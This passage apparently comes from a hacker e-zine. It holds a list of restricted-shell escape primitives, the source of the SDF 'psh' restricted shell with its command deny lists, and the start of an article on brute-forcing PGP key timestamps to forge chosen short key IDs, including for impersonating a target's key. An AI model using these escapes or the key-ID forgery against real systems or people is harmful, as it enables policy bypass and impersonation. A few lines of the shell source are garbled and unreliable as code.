- vim :: Execution primitive
    :set shell=/bin/bash 
    :shell
- arp -f <file> :: File read primitive
- iptables --modprobe=<cmd> :: Execution primitive
- tar --checkpoint-action=<cmd> :: Execution primitive
- rsync -e <cmd> :: Execution primitive
- scp -F <file> a b: :: File read primitive
- scp -S <command> a b: :: Execution primitive
- lynx 'e' :: File read/write in editor
- lynx ! :: Execute Primitive
- mail "~v" :: Execute primitive

--[ Appendix B - psh Source code 

#!/usr/pkg/bin/pdksh
stty susp '' intr '' quit '' erase '^h'
count=0
ccount=0
export TERM=xterm-color
export SHELL=/dev/null
export LESSSECURE=true
export HISTORY=$HOME/.history
export EDITOR=/usr/pkg/bin/pico
export VISUAL=/usr/pkg/bin/pico
export NNTPSERVER=VALIDATE.TO.ACCESS.USENET
export MYTTY=`tty|cut -d/ -f3,4`
export SMALLTTY=`echo $MYTTY|cut -c4-5`
export MYIP=`echo $SSH_CLIENT|awk '{print $1}'`

if [ -f ${HOME}/.profile ]
then rm -f ${HOME}/.profile
exit 0
fi
if [ -f ${HOME}/.kshrc ]
then rm -f ${HOME}/.kshrc
exit 0
fi

if [ "$MYIP" = "" ]
then MYIP="x.x.x.x"
fi
if [ -f $HOME/.pshrc ]
then BACKSPACE=`grep BACKSPACE $HOME/.pshrc|cut -d= -f2`
if [ "$BACKSPACE" != "" ]
then stty erase $BACKSPACE 1>/dev/null 2>/dev/null
fi
fi

Validate(){
echo
echo "Validation is basically designed to protect us from spammers. There"
echo "are ways you can get validated by an SDF member. For instance if you"
echo "were a student and your professor taught a class here on SDF you"
echo "could gain validation through that class."
echo
echo "If you were referred to SDF by a friend or a current SDF member,"
echo "they may be able to validate your new account for you. You can"
echo "usually find SDF egulars in either 'com' or 'irc'. Be sure to ask"
echo "them to help you."
echo
echo "(continue)\c"
read continue
echo
echo "Validating your account ensures our future! Please do it today."
echo "Remember, you make SDF what it is. Without you, we wouldn't exist."
echo
echo " 1) Get a stamped envelope, a sheet of paper and ONE (1) US Dollar."
echo " 2) Write '$LOGNAME' clearly in the upper left hand corner of the"
echo "envelope."
echo " 3) Fold the donation inside a piece of paper and place inside the"
echo "envelope."
echo " OPTIONAL: Send TWO (2) US Dollars & SASE for an SDF Bumper Sticker."
echo
echo " 4) Seal and mail to: SDF Public Access UNIX System"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo
echo "Alternatively you may 'validate' your account via PAYPAL by clicking"
echo "on the"
echo "'DONATE' button at the bottom of the http://sdf.org website. The"
echo "paypal"
echo "minimum is \$3. Please include 'Validate $LOGNAME' in the Payment"
echo "For field."
echo
#echo "We also accept BitCoin for validation:"
echo "17GQEeNNHYPmkdgzHmHXiyMaVfgrhPvGBQ"
echo "We also accept BitCoin - Please type 'bitcoin' for details."
echo
echo "You may also credit the validation fee towards 'arpa' membership"
echo "should"
echo "you decide to join 'arpa' within 30 days of validating your account."
echo
echo "(continue)\c"
read continue
echo
echo "To see what you get as a validated member, type 'user'"
echo "For Lifetime ARPA membership to SDF via paypal, type 'arpa'"
echo "To see a list of UNIX commands you can use *NOW*, type 'unix'"
echo "To view user contributed tutorials, visit http://sdf.org/?tutorials"
echo "US Military Personnel, please type 'mil'"
echo
}

Menu(){

echo "SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*"
echo
echo " what - what can I use this account for?"
echo " unix - a listing of UNIX commands available to you NOW"
echo " how - information on increasing membership"
echo " teach - using SDF in a classroom setting"
echo " dialup - information about SDF dialup service"
echo " arpa - about lifetime arpa membership"
echo " bboard - sdf user message boards"
echo " commode - chat with other users online"
echo " ysm - chat on the ICQ network"
echo " bsflite - chat on the AIM network"
echo " msnre - chat on the MSN network"
echo " ttytter - listen to Twitter tweets anonymously"
echo " lynx - browse the WWW textually or access GOPHER"
echo " bksp - set your BACKSPACE key"
echo " faq - frequently asked questions"
echo " software - display software programs installed on the system"
echo " quote - get a real time stock quote"
echo " games - a listing of available games"
echo " thxmoo - connect to the THXMOO"
echo " mud - connect to the SDFmud"
#echo " delme - delete your free account"
echo " validate - gain additional shell access (also try 'user' for"
echo "details)"
echo

}

Move(){
echo "Basic movement in $1:"
echo
echo "j - down (or rotate)"
echo "k - up (or rotate)"
echo "h - left"
echo "l - right"
echo "q or Q to quit"
echo
echo "[RETURN]\c"
read ret
}

case `uname -n` in
ol) /usr/local/bin/maint
kill -9 0 ;;
mx) echo
echo "mx is reserved for mail service only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
sverige) echo
echo "sverige is reserved for MetaARPA members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
vinland) echo
echo "vinland is reserved for VHOST members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
esac

/usr/pkg/bin/expire
#echo "Would you like to VALIDATE your account now? (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 121|89) echo "YES"
# Validate ; echo "[RETURN]\c";read return;;
# *) echo "NO" ;;
#esac
echo
echo "Please press your BACKSPACE key: \c"
stty raw
dd of=.$$ count=1 1>/dev/null 2>/dev/null
stty -raw
stty erase `head -1 .$$` 2>/dev/null
rm -f .$$
#echo
#echo "Enable Colours: (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 89|121) COLOR=TRUE
# touch -f $HOME/.color ;;
# *) COLOR=FALSE ;;
#esac
clear
echo
echo "===================================================================="
echo "SDF host uptime report for Seattle WA, Dallas TX (USA) and Germany"
echo " Please use 'tty.sdf.org' for general access"
echo "===================================================================="
echo
/usr/local/bin/ruptime -a
echo "(continue)\c"
read return
/usr/pkg/games/pom
/usr/pkg/bin/phoon
echo "(continue)\c"
read return
/usr/pkg/bin/guestbook -l 50
echo "\nType 'help' for Commands."
echo "Type 'com' to chat with other users."
echo "Type 'ttytter' to listen to Twitter Tweets anonymously."
echo "Type 'mud' to play the SDFmud."
case `url $LOGNAME` in
*.*.*) echo "\nYour website is http://`url ${LOGNAME}|awk '{print $1}'`"
echo "with files in $HOME/html\n" ;;
*) echo "Type 'mkhomepg' to set up your personal website.\n"
esac
case `echo $RANDOM|cut -c1` in
1|2|3|4|5) echo "Did you know you can become a permanent LIFETIME member"
echo "of SDF"
echo "by making a onetime donation of \$36? Type 'arpa' for more info!\n" \
;;
6|7|8|9) echo "Did you know you can validate your account and gain weekend"
echo "IRC access"
echo "by making a donation of \$1 to \$3? Type 'validate' for more"
echo "info!\n" ;;
esac
/usr/pkg/bin/dues -p
#Menu
PROMPT="`uname -n`"
while true
do
if [ ! -d $HOME ]
then echo "You may have become an ARPA member."
echo
echo "The update is now taking place and may require 2 or 3 minutes to"
echo "complete. You will now be logged out. When you reconnect, please"
echo "use ssh to connect to 'tty.sdf.org' for load balancing."
echo
echo "[RETURN]\c"
read return
kill -9 0
fi

if [ -f $HOME/.mailcap ]
then rm -f $HOME/.mailcap
fi
if [ "$COLOR" = "TRUE" ]
OMPT

thene echo "$PROMPT:`pwd`> \c"
fi
read command
arg=`echo ${command}|awk '{print $2,$3,$4,$5,$6}'`

#if [ "$ccount" -gt "6" ]
#then echo "\nPlease 'validate' or join 'arpa' today."
# echo "Your membership ensures our future!!\n"
# ccount=0
#else ccount=`expr $ccount + 1`
#fi
echo "[`date +"%d-%b-%y %H:%M:%S"` $MYIP $MYTTY $PROMPT] $PWD $command" \
2>/dev/null >>$HISTORY
case `echo $command|awk '{print $1}'|tr A-Z a-z` in
tty) tty;;
stty) stty;;
lock) lock;;
ulimit) ulimit;;
uname*) uname `echo ${command}|awk '{print $2}'` ;;
echo*) shift ${command}
echo "${command}" ;;
how) /usr/local/bin/how;;
cal*) /usr/pkg/bin/cal `echo $command|awk '{print $2}'` ;;
what) /usr/local/bin/newbie
;;

passwd*|chfn*|chsh*|maint) /usr/local/bin/passwd ;;
url*) url=`echo $command|awk '{print $2}'`
url $url;;
gopher*) site=`echo $command|awk '{print $2}'`
if [ "$site" = "" ]
then lynx -anonymous -restrictions=all gopher://sdf.lonestar.org
else lynx -anonymous -restrictions=all $site
fi
;;
bksp*) bksp=`echo $command|awk '{print $2}'`
if [ "$bksp" = "" ]
then echo "\nTo set your backspace key, type 'bksp' then press your"
echo "actual key and then press return.\n"
else stty erase $bksp
echo "BACKSPACE=$bksp" > $HOME/.pshrc
fi;;

bitcoin*) /usr/local/bin/bitcoin ;;
sftp*|ftp*) echo "\nPlease 'validate' your account to FTP files to and"
echo "from your SDF account.\n" ;;
tar*|make|cc*|tf*|gcc*|g++*|perl*|python*|ruby*|*configure*|netstat*| \
telnet*|ssh*|rlogin*|screen*|nmap*|wget*)
echo "\nTo use this feature, please join the SDF 'arpa' membership"
echo "ARPA membership is available to you for a one time donation of only"
echo "\$36."
echo
echo "Your membership ensures our future! Type 'arpa' for details.\n"
;;
getdialup*) npa=`echo $command|awk '{print $2}'`
/usr/local/bin/getdialup $npa ;;
setdialup) echo "Please validate your account first. For now you can use"
echo "'getdialup' to find access numbers in your area." ;;
phlog|deskshots|sdfers) echo "Please validate your account first." ;;
dialup) /usr/local/bin/dialup ;;
games) /usr/local/bin/games ;;
mud) /usr/pkg/bin/mud ;;
war) /sys/sdf/bin/war ;;
warsetup) /sys/sdf/bin/warsetup ;;
thxmoo) /usr/pkg/bin/thxmoo ;;
bj) /usr/pkg/games/bj;;
lander) /usr/pkg/games/lander;;
othello) /usr/pkg/games/othello;;
advent) /usr/pkg/games/advent;;
zork) /usr/pkg/games/advent;;
tttt) /usr/pkg/games/tttt;;
moon) /usr/pkg/bin/moon-buggy;;
tetrinet) if [ "$LINES" -lt "50" ]
then echo "% tetrinet requires your TTY to be at least 50 lines."
sleep 2
fi
tetrinet $LOGNAME tetrinet.sdf.org
;;
tess) /usr/pkg/games/tess;;
c4) /usr/pkg/games/c4;;
ski) /usr/pkg/games/ski;;
knight) /usr/pkg/games/knight;;
suicide) /usr/pkg/games/suicide;;
dinkum) /usr/pkg/games/dinkum;;
aybabtu) /usr/local/bin/aybabtu;;
barnacle) /usr/pkg/bin/barnacle;;
invaders) /usr/pkg/games/invaders
stty sane ;;
life) /usr/pkg/bin/life /usr/pkg/share/life/tiny.life ;;
order) echo "Please validate your account first.";;
ysm) /usr/pkg/bin/ysm;;
micq) /usr/pkg/bin/rmicq;;
bsflite) /usr/pkg/bin/bsflite;;
msnre) /usr/pkg/bin/msnre;;
dopewars) dopewars;;
zombies) Move $command
/usr/pkg/bin/zombies;;
snake) Move $command
/usr/pkg/games/snake;;
wanderer) Move $command
/usr/pkg/games/wand;;
worm) Move $command
/usr/pkg/games/worm;;
greed) Move $command
/usr/pkg/games/greed;;
tetris) Move $command
/usr/pkg/games/tetris;;
sokoban) Move $command
/usr/pkg/games/sokoban;;
robots) Move $command
/usr/pkg/games/robots;;
torus) Move $command
/usr/pkg/games/torus;;
mazewar) /usr/local/bin/mazewar;;
mdg) /usr/local/bin/mdg
if [ "$?" != "0" ]
then echo "\nMDG might not be running at the moment"
echo "Please try again later."
fi;;
dict*) args=`echo $command|awk '{print $2}'`
dict $args
;;
quote*) args=`echo $command|awk '{print $2}'`
quote $args
;;
cal*) args=`echo $command|awk '{print $2}'`
cal $args
;;
domains) /usr/local/bin/domains ;;
unix) unix ;;
linux) linux;;
dig*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" "$8}'`
dig $domain
;;
host*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" \
"$8}'`
host $domain
;;
geoip*) domain=`echo $command|awk '{print $2}'`
geoip $domain
;;
whois*) domain=`echo $command|awk '{print $2}'`
jwhois $domain
;;
nslookup*) domain=`echo $command|awk '{print $2}'`
nslookup $domain
;;
pkg_info) pkg_info 2>/dev/null|sort|more ;;
lynx*restrict*) echo $command|mailx -s "$LOGNAME" smj;;
lynx*) url=`echo $command|awk '{print $2}'`
if [ "$url" = "" ]
then lynx -anonymous -restrictions=all http://sdf.lonestar.org
else case $url in
http:*) ;;
*) url="http://$url" ;;
esac
lynx -anonymous -restrictions=all $url
fi
;;

edit*|vi*|pico*|emacs*) file=`echo $command|awk '{print $2}'`
if [ "$file" = "" ]
then echo "usage: edit {file}"
else case $file in
*../*|*.kshrc*|*.bashrc*|*.pshrc*|*.muttrc*|*.telnet*|*.mailcap*|*. \
forward*|*.plan*|*.cfg*|*.history*) echo "usage: edit {file}";;
*) /usr/pkg/bin/pico -t -b -o $HOME $PWD/$file ;;
esac
fi
;;
man*) man `echo $command|awk '{print $2}'`;;
rm*) target=`echo $command|awk '{print $2}'`
if [ "`echo $command|awk '{print $3}'`" != "" ] || [ "$target" = "" ]
then echo "usage: rm {filename}"
else case $target in
*.history*|*psh*|*.hushlogin*) echo "Can't remove $target";;
*) if [ -d $target ]
then rm -rf $target
else rm $target
fi;;
esac
fi;;
mv*) oldname=`echo $command|awk '{print $2}'`
newname=`echo $command|awk '{print $3}'`
if [ "`echo $command|awk '{print $4}'`" != "" ] || [ "$oldname" = "" ] || \
 [ "$newname" = "" ]
then echo "usage: mv {oldfile} {newfile}"
else case $oldname$newname in
*.muttc*|*.kshrc*|*.mailcap*|*.telnet*|*.plan*|*html*|*.forward*|*. \
history*|*psh*|*.hushlogin*|*.cfg*) echo "Cant move $oldname to $newname";;
*) mv $oldname $newname ;;
esac
fi;;
ping*) /sbin/ping -c5 `echo $command|awk '{print $2}'`;;
teach) cat ~ftp/pub/sdf/faq/TEACH/01;;
traceroute*) traceroute `echo $command|awk '{print $2}'` & ;;
games) games;;
disk) disk;;
df*) df `echo $command|awk '{print $2}'` ;;
oneliner) /usr/pkg/bin/oneliner;;
rogue) /usr/pkg/games/rogue ;;
hack) /usr/pkg/games/hack ;;
nethack) /usr/pkg/bin/nethack ;;
hunt*) echo
echo "hunt commands:"
echo
echo "j - down"
echo "k - up"
echo "h - right"
echo "l - right"
echo "1 - gun"
echo "2 - grenade"
echo "3 - bomb"
echo "q - quit"
echo
echo "the shift key plus j,k,h or l changes direction"
echo
/usr/pkg/games/hunt `echo $command|awk '{print $2}'`;;
upload) echo "press CTRL-X several times to abort."
lrz -y;;
mkdir) directory=`echo $command|awk '{print $2}'`
case $directory in
*html*|*.plan*) echo "usage: mkdir {name}";;
*) mkdir $directory;;
esac;;
#mkhomepg*|mkhome*) mkhomepg `echo $command|awk '{print $2}'`;;
mkhomepg*|mkhome*) echo "mkhomepg has been temporarily disabled for"
echo "prevalidated users." ;;

vhost) echo
echo " As a lifetime ARPA member, you can increase your membership level"
echo " so that you may virtually host your own domain name on SDF. This"
echo " includes DNS, mail service and virtual webhosting. For more info"
echo " check out the FAQ: file"
echo ;;
help) Menu;;
profiles) /usr/pkg/bin/profiles ;;
#freeirc) echo "% 'freeirc' is available to ALL validated users from"
echo "Friday 23:59:59"
# echo " through Monday 00:00:01 UTC. Please 'validate' your account"
# echo "today!" ;;
user) echo "\nValidated users (\$1.00 or more) have immediate access to:\n"
echo " 200mb total (home, web, mail & gopher)"
echo " incoming file transfers via ftp or sftp"
echo " elm, pine, mutt, mailx, rmail, pop3, gopher"
echo " bash, ash, ksh, tcsh, rc, zsh, tclsh"
echo " your URL http://$LOGNAME.freeshell.org"
echo " limited cgi execution (shell scripts)"
echo " icq, aim, talk, commode, bboard"
echo " dialup ppp/shell access in the US and Canada"
echo " USENET and ClariNET read/post access"
echo " freeirc on Saturdays and Sundays"
echo " hundreds of UNIX utilities"
echo
echo "The purpose of the prevalidated account is to help newusers"
echo "learn about the UNIX system. Type 'unix' to see what UNIX"
echo "commands are available to you right now. You can validate"
echo "your account today! type 'validate' to validate\n";;
env) env;;
set) set;;
#delme) delme;;
bboard) /usr/pkg/bin/bboard;;
eggdrop*) echo "% eggdrop is available to MetaARPA members only" ;;
psybnc*) echo "% psybnc is available to MetaARPA members only" ;;
arpa|join|member) arpa;;
auction) auction;;
cat*|more*|less*) file=`echo $command|awk '{print $2}'`
case $file in
*psh*) file="" ;;
*random*|*null*|*zero*) echo "% Ja tvoi sluga ja tvoi rabotnik";file="" ;;
esac
if [ "$file" = "" ]
then echo "usage: cat {filename}"
else if [ "`wc -l $file|awk '{print $1}'`" -ge "500" ]
then tail -500 $file
else cat $file
fi
fi;;
software*) /usr/local/bin/software `echo $command|awk '{print $2}'` ;;
cd*) cd `echo $command|awk '{print $2}'`;;
finger*) user=`echo $command|awk '{print $2}'`
case ${user} in
*-*) user=root ;;
esac
size=`ruptime -a|awk 'END {print $1}'`
if [ "$user" = "" ]
then echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)"
else finger -m $user
fi ;;
date) date ;;
whereis*) whereis `echo $command|awk '{print $2}'`;;
locate*) locate `echo $command|awk '{print $2}'` ;;
whoami*) /usr/bin/whoami ;;
who|w|ps*|last*)
size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;
uptime|ruptime*) ruptime -a;;
chmod*) chmod `echo $command|awk '{print $2" "$3}'` ;;
ls*|ll*|dir*) if [ "$COLOR" = "TRUE" ]
then /usr/pkg/bin/colorls -a `echo $command|awk '{print $2}'|tr R r`
else ls -a `echo $command|awk '{print $2}'|tr R r`
fi ;;
sl*) /usr/pkg/bin/sl ;;
pwd) pwd;;
msg) msg ;;
# ps*) ps `echo $command|awk '{print $2}'` ;;
validate) Validate ;;
mil) /usr/local/bin/mil ;;
why) echo
echo "It didn't used to be this way .. but you must understand that your"
echo "small token of trust builds a better SDF for all of us:"
echo
echo "Due to the increased number of security and spam attacks, we are now"
echo "asking that you send ONE US Dollar (or 5 EURO note) as a token of"
echo "your sincerity in becoming a longterm member of our community. It is"
echo "unfortunate that the net has become filled with people whose daily"
echo "goal in life is to terriorize others online. We believe that asking"
echo "for ONE US Dollar would not present a burden"
echo "to anyone in the world. We hope to keep SDF a safe and secure haven"
echo "for you and other shell users. To get an SDF bumper sticker, send in"
echo "TWO US Dollars and a SASE (Self-Addressed Stamped Envelope). Please"
echo "include your username."
echo
echo " SDF public access UNIX system"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo;;
w*) size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;

alpine*|pine*|mail*|mutt*|elm*) case `echo $command|awk '{print $2}'` in
-*) echo "unknown mail flag." ;;
*) mutt -F /sys/pkg/etc/rmuttrc ;;
esac;;
*irc*|bitchx*|irssi*|epic*|freeirc*)
#tetrinet $LOGNAME tetrinet.sdf.org ;;
echo "-=- Basic IRC Commands -=-"
echo
echo "/list - List channels"
echo "/join #channel - Join a channel"
echo "/list #channel - Leave a channel"
echo "/msg nick msg - Send a private message"
echo "/who - Who is on"
echo "/quit - Quit IRC"
echo
echo "-(continue)-\c"
read ret
/usr/pkg/bin/oirc -p 7000 ${LOGNAME} irc.sdf.org
#/usr/pkg/bin/oirc -p 6667 ${LOGNAME} irc.sdf.org
echo ;;

com|chat|commode) \
room=`/usr/pkg/bin/comwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/com ;;
pcom|pcommode) room=`/usr/pkg/bin/pcomwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/pcom ;;
ttytter*|twitter*) echo "% Twitter username (or [RETURN] for anonymous):\c"
read tweet
if [ "$tweet" = "" ]
then echo "% Logging in anonymously"
/usr/local/bin/ttytter -anonymous
else /usr/local/bin/ttytter -user=$tweet
fi ;;
w2k) /usr/local/bin/w2k ;;
mkgopher) mkgopher;;
faq) faq;;
clear) clear;;
usenet|trn*|tin*|slrn*|nn*|rn*) echo "% USENET is available to validated"
echo "users." ;;
die) echo "you has failed."
sleep 4
exit 0 ;;
logout|leave|bye|quit|exit|escape|terminate|cease|logoff|end)
clear
#echo "Would you like to remove your account from our system? (y/n) \c"
#read ans
# case $ans in
# y*|Y*) delme ;;
# *) echo "% '$LOGNAME' will not be deleted." ;;
# esac
echo "Good Bye from the S D F - 1 .."
echo
echo "Please 'validate' or join 'arpa' soon."
echo "Your support is appreciated!"
echo
echo "Thank you!"
sleep 8
exit 0;;
uinfo|expire) uinfo;expire ;;
dues) /usr/pkg/bin/dues ${arg} ;;
#helpdesk) /usr/pkg/bin/helpdesk ;;
guestbook) /usr/pkg/bin/guestbook ;;
id*) /usr/bin/id ${arg} ;;
nospam) echo "You must be validated to use this feature."
;;
*) if [ "$command" != "" ]
then echo "psh: $command: not found - try 'help' for commands"
else if [ "$count" -gt "20" ]
then exit 0
else count=`expr $count + 1`
fi
fi;;
esac
doneecho "


|=[ 0x04 ]=---=[ Personalized PGP Key IDs - f1los0tt1l3 ]=---------------=|


|=-----------------------------------------------------------------------=|
|=-----------=[ Personalized PGP Key IDs for fun and profit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ f1los0tt1l3 ]=---------------------------=|
|=-----------------------------------------------------------------------=|


---[ Contents

  1 - Introduction
   1.1 - Prior work
  2 - The spec
  3 - The attack
   3.1 - Preparation
   3.2 - The crash
    3.2.1 - Runtime stats
   3.3 - The patch
  4 - Conclusion
  5 - References
  6 - Code

---[ 1 - Introduction

Everybody should be allowed to have his (or someone's) own PGP key ID. Who
doesn't want his PGP key to match his favorite hex nickname or his
target's key for some cheap social engineering? I certainly want, so I
started researching how they are derived and if they could be bruteforced.

Note: when we speak about key IDs here we mean the 4-byte short ones that
everybody love to use. However, given enough processing power (or maybe a
SHA1 ASIC|preimage attack) the process can obviously scale to any key ID
length.

-----[ 1.1 - Prior work

GIYF, right? Well, a couple people tried this and lived to tell the tale
(or, well, decided to make it public) but none of them permitted me to get
a 4096 bit RSA key as I wanted it.

In May 2010, halfdog posted on full-disclosure [1] some Java code that
worked on DSA keys. Not exactly fast or customizable, but hey, it was 3
years ago.

Then, in Dec 2011, Asheesh, a Debian dev particularly fond of his key ID,
found a way to create a new RSA 4096 key with that ID (and a bug in GnuPG
handling of duplicate keys) [2]. He highlighted the disruptive potential
of that and decided not to release the code. Bummer.

But the keyservers carry even older evidence (even if one shouldn't trust
the key creation field, especially on these keys): the first example of
custom IDs I could find is

    pub  1024R/A69AB99CDEADBEEF 1995-09-28

that actually employs a old packet type.

So we are not doing anything truly new, but there's still not a public
method to get an arbitrary key with an arbitrary key ID.

---[ 2 - The spec

So, let's get our hands dirty: grab the OpenPGP spec, RFC 4880 [3], and
look up how are those key IDs derived [RFC 4880 - 12.2].

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   For a V3 key, the eight-octet Key ID consists of the low 64 bits of
   the public modulus of the RSA key.

---------------------------------------------------------------------------

Woah, that easy? No, it's not. Version 3 keys are deprecated [RFC 4880 -
5.5.2], for a bad reason - key IDs collisions, ahem - and a good reason -
MD5. So, as we don't want to build our new shiny RSA 4098 on MD5, let's
move on to V4 keys.

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   A V4 fingerprint is the 160-bit SHA-1 hash of the octet 0x99,
   followed by the two-octet packet length, followed by the entire
   Public-Key packet starting with the version field.  The Key ID is the
   low-order 64 bits of the fingerprint.

---------------------------------------------------------------------------

Great, so what's in a Public-Key packet?

-------------[ RFC 4880 - 5.5.2.  Public-Key Packet Formats ]--------------

   A version 4 packet contains:

     - A one-octet version number (4).

     - A four-octet number denoting the time that the key was created.

     - A one-octet number denoting the public-key algorithm of this key.

     - A series of multiprecision integers comprising the key material.

---------------------------------------------------------------------------

Note: numbers are big-endian [RFC 4880 - 3.1]

So the variable parts are the creation timestamp and the key material. The
key material is a bunch of algorithm-specific MPI [RFC 4880 - 3.2] which
can't be tampered with without changing their value.

One might also try to add garbage to the packet, but implementations strip
it. Bummer.

---[ 3 - The attack

Great, we know what constitutes the key ID, and we know that we can tamper
with the key creation value and/or with the RSA/DSA/Elgamal parameters. I
decided to only loop through the key creation field for a simple reason: I
don't trust a crappy tool written by me with RSA primes selection, in
particular in a scenario like this where a lot of different primes are
needed, as skews can lead to disastrous consequences [4].

After all entropy usage couldn't be optimized much and at least this way
we have the peace of mind of GnuPG generated keys.

So we will simply build a bruteforce on the key creation timestamp value.

-----[ 3.1 - Preparation

Ok, let's dive in. First of all fence your GnuPG env, to avoid cluttering
or damaging your own.

    $ mkdir -m 700 GNUPGHOME && export GNUPGHOME=`pwd`/GNUPGHOME

Now we need to generate a pool of enough keys to have a fair chance of
finding a match, but how many? Well, obviously it depends on the number of
seconds in the time frame we consider acceptable for the key creation time.

Let's dive into some math. Since SHA1 is unbiased each try is independent
and for each try we have a fixed probability of finding a match: one into
the number of different possible suffixes = 1 / 2^32.

So, the only thing that matters is how many tries we can do. This number
is s (seconds in the time frame) * x (number of keys in the pool).

The probability of finding a match in k tries is 1 less the probability of
failing all of them [5] and this last is (prob of failing one) ^ k =
((2^32 - 1) / 2^32) ^ k.

Here are the final formula and a handy table:

            2^32 - 1   s * x          s = seconds in the time frame
  y = 1 - ( -------- )                x = number of keys in the pool
              2^32                    y = probability of a success

  +--------------+------+------+------+------+------+
  | frame \ prob | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +--------------+------+------+------+------+------+
  |         past |    3 |    5 |    8 |   10 |   15 |
  +--------------+------+------+------+------+------+
  |           5y |   19 |   38 |   63 |   82 |  126 |
  +--------------+------+------+------+------+------+
  |           1y |   95 |  189 |  314 |  408 |  628 |
  +--------------+------+------+------+------+------+

For a fancy 3D graph you can plot the probability on a (years in the time
frame X keys in the keypool) space [6]:

  y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x)

GnuPG has a convenient function to generate keys in batch mode:

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --trustdb-name ./trustpool.gpg \
    --gen-key --batch batchfile.txt

    # batchfile.txt
    Key-Type: RSA
    Key-Length: 4096
    Name-Real: Filippo Valsorda
    Name-Comment: f1los0tt1l3
    Name-Email: f1los0tt1l3@phrack.com
    Expire-Date: 0

Note: it does not matter what you set in the Name-* fields, as we are
going to discard the uid to create a validly signed one later.

Set it to run the number of times you want, maybe plug in haveged [7], a
Geiger or a radio producing white noise and... uh, go grab a coffee.

-----[ 3.2 - The crash

Well, now we have our keypool and we need to bruteforce the key ID out of
it. I wrote a Python 3 + Cython parallelizable implementation, crash.py.

Compile the Cython module with (you'll need Cython and OpenMP):

    $ python3 setup.py build_ext --inplace

Note: clang and old gcc versions panicked, I used gcc 4.7.

Then start the bruteforce with

    $ python3 crash.py pubpool.gpg NEWKEYID [0xTIMESTAMP]

where 0xTIMESTAMP is the lowest limit to the creation time, if any.

Want to know something cool? The only thing needed to do the bruteforce is
the pubpool, so you can export it out of your crappy airgapped system and
perform the number crushing on some powerful untrusted machine.

You will hopefully get a result like this

  Current fingerprint: 9b179a2af2f8a744b2214de4eec578f57e61d52a
  Current timestamp: 0x512187c9
  NEW fingerprint: d8efd70f8479432e9158ac27eb56af7c42424242
  RESULT timestamp: 0x1b550652

------[ 3.2.1 - Runtime stats

The bulk of the heavy-lifting involved in this bruteforce is making the
SHA1 hashes, and one of them is done for each timestamp tried. The number
of tries is clearly independent of the width of the time frame, and grows
with the probability of finding a match. The two - probability and tries -
are bound by a simplified version of the formula above.

            2^32 - 1   x
  y = 1 - ( -------- )                x = tries / SHA1 hashes
              2^32                    y = probability of a success

So what matters here is what SHA1 hashrate we manage to get. The crash.py
Cython implementation is quite fast, and achieves 3.0 * 10^6 h/s on a
quad-core 2.3 GHz i7 or 8.3 * 10^6 h/s on a AWS EC2 cc2.8xlarge instance.

Note: this means that a matching key would cost you $0.50 of Spot Instance
as of April 2013.

However, much better can be done: the oclHashcat-plus guys claim a 3.081 *
10^9 SHA1/s on a AMD hd6990 GPU [8]. With an hashrate like that, a match
can be found in a matter of seconds. Writing a high-performance CUDA or
OpenGL implementation is left as an exercise to the reader ;)

Here is a reference table of running times:

  +----------------+------+------+------+------+------+
  |    probability | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +----------------+------+------+------+------+------+
  |   tries / 10^9 |  2.9 |  5.9 |  9.8 | 12.8 | 19.7 |
  +----------------+------+------+------+------+------+
  |  runtime on i7 |  17m |  33m |  55m |  71m | 110m |
  +----------------+------+------+------+------+------+
  | runtime on EC2 |   6m |  12m |  20m |  26m |  40m |
  +----------------+------+------+------+------+------+
  | runtime on GPU |   1s |   2s |   3s |   4s |   6s |
  +----------------+------+------+------+------+------+

-----[ 3.3 - The patch

Now we have to patch the key. patch.py, incredibly, does exactly so.

First, export the secret key for which you had the match

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --export-secret-keys OLDKEYID > privkey.gpg

Then run patch.py on it, passing it the "RESULT timestamp" from crash.py:

    $ python3 patch.py privkey.gpg TIMESTAMP > resultkey.gpg

Finally, force gpg to import the key even if the (invalid) bounding
signature has been stripped:

    $ gpg --allow-non-selfsigned-uid --import resultkey.gpg

And restore the bounding signature by creating a new uid:

    $ gpg --edit-key NEWKEYID

    gpg> adduid
    gpg> uid 1
    gpg> deluid
    gpg> trust
    gpg> check
    gpg> save

Note: don't create the new uid as an exact copy of the old, otherwise
deluid will delete both of them from the secret key - it's a GnuPG bug.

Done! You now have your new shiny PGP key with a personal key ID. Export
it to your main GnuPG env or whatever.

---[ 4 - Conclusion

Have fun, there are still many interesting uncatched key IDs out there:
0x11111111, 0xabaddeed, 0xaaaaaaaa, 0xg00d1dea, 0x27182818, 0x14142135...
Please just leave 0x31415926, 0x42424242 and 0x13371337 for me ;) and
don't (publicly) duplicate other people's keys.

Finally, I know what you are searching for: the option is --keyid-format
long ;)

---[ 5 - References

